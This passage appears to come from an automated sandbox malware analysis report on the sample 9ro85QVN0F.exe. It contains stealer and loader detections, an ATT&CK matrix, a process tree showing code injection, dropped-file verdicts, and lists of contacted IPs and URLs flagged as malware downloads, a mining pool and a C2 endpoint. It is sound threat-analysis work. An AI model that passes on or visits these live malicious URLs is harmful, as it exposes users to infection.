                      Source: Yara match | File source: 1.2.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.iscgwer.5615a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara match | File source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Tofsee
                      Source: Yara match | File source: 25.3.F4CF.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 25.2.F4CF.exe.650e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 25.2.F4CF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 25.2.F4CF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: F4CF.exe PID: 6380, type: MEMORYSTR
                      Source: Yara match | File source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      Yara detected RedLine Stealer
                      Source: Yara match | File source: 26.2.FD6B.exe.436ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.FD6B.exe.422f910.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.FD6B.exe.436ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.FD6B.exe.422f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara match | File source: 17.0.iscgwer.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.0.iscgwer.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.0.53DC.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.0.53DC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.0.iscgwer.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.0.53DC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.9ro85QVN0F.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.53DC.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.1.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.1.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.1.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.iscgwer.5615a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara match | File source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Tofsee
                      Source: Yara match | File source: 25.3.F4CF.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 25.2.F4CF.exe.650e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 25.2.F4CF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 25.2.F4CF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: F4CF.exe PID: 6380, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Code function: 25_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts 1 | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 1 1 | Input Capture 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 1 | Exfiltration Over Other Network Medium | Web Service 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 5 3 1 | Valid Accounts 1 | Valid Accounts 1 | Deobfuscate/Decode Files or Information 1 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Shared Modules 1 | Windows Service 3 | Access Token Manipulation 1 | Obfuscated Files or Information 3 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Encrypted Channel 2 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Exploitation for Client Execution 1 | Logon Script (Mac) | Windows Service 3 | Software Packing 3 3 | NTDS | System Information Discovery 2 2 7 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Standard Port 1 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Command and Scripting Interpreter 3 | Network Logon Script | Process Injection 6 1 3 | Timestomp 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 4 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Service Execution 2 | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Security Software Discovery 5 7 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 2 5 | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 3 1 | Proc Filesystem | Virtualization/Sandbox Evasion 2 3 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts 1 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation 1 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                      Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Virtualization/Sandbox Evasion 2 3 1 | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
                      Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection 6 1 3 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
                      Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Hidden Files and Directories 1 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 553220 | Sample: 9ro85QVN0F.exe | Startdate: 14/01/2022 | Architecture: WINDOWS | Score: 100

Start node:
• DNS/IP: transfer.sh; pool.supportxmr.com; 5 other IPs or domains
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 16 other signatures

Process tree as drawn in the graph (node labels kept as shown, including the file/registry counters next to process names):

• 9ro85QVN0F.exe (started)
  • Signatures: Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
  • 9ro85QVN0F.exe (started)
    • Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
    • explorer.exe 12 (injected)
      • DNS/IP: 185.233.81.115, 443, 49790 SUPERSERVERSDATACENTERRU Russian Federation; 81.163.30.181, 49884, 49892, 49895 IR-RASANAPISHTAZIR Russian Federation; 10 other IPs or domains
      • Created files (dropped): C:\Users\user\AppData\Roaming\iscgwer, PE32; C:\Users\user\AppData\Local\Temp\FE11.exe, PE32; C:\Users\user\AppData\Local\Temp\FD6B.exe, PE32; 12 other malicious files
      • Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
      • E6C4.exe (started)
        • Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking mutex); 4 other signatures
      • 53DC.exe (started)
        • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
        • 53DC.exe (started)
          • Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
      • FD6B.exe 3 (started)
        • Signatures: Antivirus detection for dropped file; Sample uses process hollowing technique
        • FD6B.exe (started)
      • 3 other processes
        • Created files (dropped): C:\Users\user\AppData\Local\...\bzxmernq.exe, PE32
        • cmd.exe (started)
          • Created files (dropped): C:\Windows\SysWOW64\...\bzxmernq.exe (copy), PE32
          • conhost.exe (started)
        • cmd.exe (started)
          • conhost.exe (started)
        • WerFault.exe 3 10 (started)
• iscgwer (started)
  • Signatures: Machine Learning detection for dropped file
  • iscgwer (started)
    • Signatures: Creates a thread in another existing process (thread injection)
• svchost.exe (started)
  • Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
  • MpCmdRun.exe (started)
    • conhost.exe (started)
• 10 other processes
  • DNS/IP: 192.168.2.1 unknown unknown

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
9ro85QVN0F.exe | 37% | Virustotal | | Browse
9ro85QVN0F.exe | 100% | Joe Sandbox ML | |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\FD6B.exe | 100% | Avira | HEUR/AGEN.1211353 |
C:\Users\user\AppData\Local\Temp\bzxmernq.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
C:\Users\user\AppData\Local\Temp\D54.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\iscgwer | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\656C.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\E6C4.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\F4CF.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\53A8.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\14F6.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\53DC.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\FE11.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\433C.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\411E.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\27E3.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\7480.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\FD6B.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\bzxmernq.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\411E.exe | 46% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\411E.exe | 77% | ReversingLabs | Win32.Trojan.Raccoon |
C:\Users\user\AppData\Local\Temp\433C.exe | 34% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\433C.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt |
C:\Users\user\AppData\Local\Temp\53A8.exe | 50% | ReversingLabs | Win32.Infostealer.Generic |
C:\Users\user\AppData\Local\Temp\53DC.exe | 47% | ReversingLabs | Win32.Trojan.DiskWriter |
C:\Users\user\AppData\Local\Temp\656C.exe | 28% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\D54.exe | 29% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\D54.exe | 81% | ReversingLabs | Win32.Trojan.Raccrypt |

Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
22.0.53DC.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
22.0.53DC.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
16.2.iscgwer.5615a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
26.0.FD6B.exe.cf0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
22.0.53DC.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
1.0.9ro85QVN0F.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.0.iscgwer.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.0.iscgwer.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
17.0.iscgwer.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.0.iscgwer.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
22.0.53DC.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
20.2.53DC.exe.6315a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.0.iscgwer.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
42.0.FD6B.exe.1a0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
22.2.53DC.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
42.0.FD6B.exe.1a0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
19.2.411E.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
24.3.E6C4.exe.680000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
19.0.411E.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.0.iscgwer.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
25.2.F4CF.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
25.3.F4CF.exe.780000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
26.2.FD6B.exe.cf0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
26.0.FD6B.exe.cf0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
19.3.411E.exe.510000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
42.0.FD6B.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
22.0.53DC.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
19.0.411E.exe.500e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
1.1.9ro85QVN0F.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.0.iscgwer.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
24.2.E6C4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
26.0.FD6B.exe.cf0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
42.2.FD6B.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
25.2.F4CF.exe.650e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
22.0.53DC.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
24.2.E6C4.exe.660e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
22.1.53DC.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.1.iscgwer.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
1.0.9ro85QVN0F.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.0.411E.exe.500e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
22.0.53DC.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
0.2.9ro85QVN0F.exe.6315a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.2.411E.exe.500e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.0.411E.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
1.2.9ro85QVN0F.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
42.0.FD6B.exe.1a0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
1.0.9ro85QVN0F.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
17.2.iscgwer.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
26.0.FD6B.exe.cf0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware |
http://host-data-coin-11.com/ | 0% | URL Reputation | safe |
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 13% | Virustotal | | Browse
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware |
http://81.163.30.181/2.exe | 1% | Virustotal | | Browse
http://81.163.30.181/2.exe | 100% | Avira URL Cloud | malware |
http://81.163.30.181/101.exe | 0% | Avira URL Cloud | safe |
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe |
http://data-host-coin-8.com/files/8474_1641976243_3082.exe | 16% | Virustotal | | Browse
http://data-host-coin-8.com/files/8474_1641976243_3082.exe | 100% | Avira URL Cloud | malware |
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe |
https://api.ip.sb/ip | 0% | URL Reputation | safe |
http://unicupload.top/install5.exe | 100% | URL Reputation | phishing |
http://81.163.30.181/1.exe | 100% | Avira URL Cloud | malware |
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | 100% | Avira URL Cloud | malware |
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe |
https://%s.xboxlive.com | 0% | URL Reputation | safe |
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe |
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | 100% | Avira URL Cloud | malware |
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware |
https://dynamic.t | 0% | URL Reputation | safe |
https://disneyplus.com/legal. | 0% | URL Reputation | safe |
http://81.163.30.181/11.msi | 0% | Avira URL Cloud | safe |
http://help.disneyplus.com. | 0% | URL Reputation | safe |
http://81.163.30.181/6236.exe | 100% | Avira URL Cloud | malware |
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool-fr.supportxmr.com | 37.187.95.110 | true | false | | high
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 8.209.70.0 | true | false | | high
cdn.discordapp.com | 162.159.130.233 | true | false | | high
privacy-tools-for-you-780.com | 8.209.70.0 | true | false | | high
goo.su | 172.67.139.105 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
data-host-coin-8.com | 8.209.70.0 | true | false | | high
a0621686.xsph.ru | 141.8.192.193 | true | false | | high
pool.supportxmr.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | 13%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://81.163.30.181/2.exe | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://81.163.30.181/101.exe | true | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://data-host-coin-8.com/files/8474_1641976243_3082.exe | true | 16%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
http://81.163.30.181/1.exe | true | Avira URL Cloud: malware | unknown
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://81.163.30.181/11.msi | true | Avira URL Cloud: safe | unknown
http://81.163.30.181/6236.exe | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp | false | | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308357030.0000023970047000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000006.00000002.308935923.0000023970042000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308377033.0000023970041000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000006.00000003.308306128.000002397005C000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000006.00000002.308935923.0000023970042000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308377033.0000023970041000.00000004.00000001.sdmp | false | | high
http://www.bingmapsportal.com | svchost.exe, 00000006.00000002.308807021.0000023970013000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmp | false | | high
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ip.sb/ip | FD6B.exe, 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, FD6B.exe, 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000006.00000003.308371145.0000023970045000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000006.00000003.308241819.0000023970067000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309062464.0000023970069000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000006.00000003.308371145.0000023970045000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000006.00000003.308349628.0000023970057000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309009579.0000023970058000.00000004.00000001.sdmp | false | | high
